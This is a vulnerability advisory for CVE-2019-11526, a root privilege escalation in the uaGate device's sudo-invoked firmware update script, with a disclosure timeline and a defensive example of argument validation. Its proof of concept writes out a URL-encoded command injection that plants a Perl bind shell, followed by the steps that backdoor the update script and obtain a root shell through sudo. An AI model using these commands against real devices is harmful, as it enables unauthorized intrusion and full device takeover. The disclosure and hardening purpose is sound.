CVE-2019-11526 - uaGate sudo privilege escalation

Abstract:

The uaGate's firmware update script, which is called by the webserver user via sudo, handles its parameters in an unsafe fashion. Along with a legitimate firmware image, a second firmware file can be supplied to the script. The second firmware image can be crafted to simply overwrite the very same firmware update script that installs the malicious firmware image. When the firmware update script is called again, it executes the payload supplied in the malicious firmware update with superuser rights.
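The root cause described above is a privileged helper that lets one argument turn into several file names. As an added illustration (not the vendor's updateFirmware script, and with function names and the staging directory chosen here as assumptions), the following POSIX shell functions contrast the weak unquoted-parameter pattern with the argument check a sudo-invoked update helper should perform before touching anything:

```shell
#!/bin/sh
# Added example, not code from the uaGate firmware. Names are assumptions.

# Weak pattern: an unquoted parameter undergoes word splitting, so an
# argument like "image.bz2 other.bz2" becomes two file names. Shown only to
# contrast with the checks below. Echoes how many words the argument became.
weak_arg_count() {
    set -- $1            # deliberately unquoted: splits on whitespace
    echo "$#"
}

# Hardened check on the argument itself: exactly one argument, a bare file
# name (no slash, no whitespace, no leading dash, no ".."), with the expected
# extension. Returns 0 if acceptable, 1 otherwise.
validate_firmware_arg() {
    [ "$#" -eq 1 ] || return 1
    case "$1" in
        ''|-*|*/*|*[[:space:]]*|*..*) return 1 ;;
        *.bz2) return 0 ;;
        *) return 1 ;;
    esac
}

# Second check on the file the name resolves to inside a fixed staging
# directory: it must be a regular file and not a symlink, so a name cannot
# be pointed at an arbitrary path. Returns 0 if acceptable, 1 otherwise.
check_firmware_file() {
    dir="$1"
    name="$2"
    validate_firmware_arg "$name" || return 1
    path="$dir/$name"                       # always quoted from here on
    [ -f "$path" ] && [ ! -L "$path" ]
}

# Demonstration when run directly (assumed staging directory).
staging="${FIRMWARE_STAGING_DIR:-/var/lib/firmware-staging}"
echo "unquoted 'image.bz2 trash.bz2' splits into $(weak_arg_count 'image.bz2 trash.bz2') words"
for candidate in "image.bz2" "image.bz2 trash.bz2" "../etc/shadow.bz2" "--interactive"; do
    if validate_firmware_arg "$candidate"; then
        echo "accepted: $candidate (would now be checked under $staging)"
    else
        echo "rejected: $candidate"
    fi
done
```

A helper that is wrapped in a sudo rule is only as safe as its argument handling: every use of the parameter must be quoted, and the helper should refuse anything that is not a single plain file name in the directory it expects, rather than relying on the caller to be well behaved.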

Attack Vector

An attacker who has already managed to gain the ability to execute code on the device can use this exploit to gain superuser rights.

Proof of Concept Details

poc #1 (mitigated in 1.71.00.1225)

# deploy a remote bind shell (using cve-2019-11527)
curl --silent --user itadmin:******** 'http://uagate/cgi-bin/it/registerAzureIotProxy.cgi?task=register&deviceId=%26perl%20-e%20%27use%20Socket%3B%24p%3D4223%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bbind%28S%2Csockaddr_in%28%24p%2C%20INADDR_ANY%29%29%3Blisten%28S%2CSOMAXCONN%29%3Bfor%28%3B%24p%3Daccept%28C%2CS%29%3Bclose%20C%29%7Bopen%28STDIN%2C%22%3E%26C%22%29%3Bopen%28STDOUT%2C%22%3E%26C%22%29%3Bopen%28STDERR%2C%22%3E%26C%22%29%3Bexec%28%22%2Fbin%2Fbash%20-i%22%29%3B%7D%3B%27%26'
# connect to the uaGate shell
ncat uagate 4223
# get proper tty 
python -c "import pty; pty.spawn('/bin/bash')"
# start proof of concept 
echo '#!/bin/bash' > /tmp/updateFirmware
echo 'if [ "$1" == "--interactive" ]; then bash; fi;' >> /tmp/updateFirmware
cat /usr/local/bin/updateFirmware >> /tmp/updateFirmware
chmod +x /tmp/updateFirmware
busybox bzip2 /tmp/updateFirmware
# next step requires writing to /usr/local/bin (cve-2019-11528)
mv /tmp/updateFirmware.bz2 /usr/local/bin/updateFirmware.bz2 
cd /usr/local/bin/
echo "just a trash file to nudge the update script" > trash.bz2
sudo ./updateFirmware "updateFirmware.bz2 trash.bz2"
sudo ./updateFirmware --interactive 

Timeline

  • day 0 - pentest of uaGate SI Device - 21.12.2018
  • day 28 - initial issue related contact to manufacturer - 18.01.2019
  • day 63 - issue report to manufacturer - 22.02.2019
  • day 66 - secure communication channel established - 25.02.2019
  • day 74 - detailed issue report to manufacturer - 05.03.2019
  • day 116 - manufacturer acknowledged security issues - 16.04.2019
  • day 125 - CVE ID issued by MITRE - 25.04.2019
  • day 229 - mitigation found in 1.71.00.1225 - 07.08.2019
  • day 293 - released - 10.10.2019

Credits

djo@mioso.com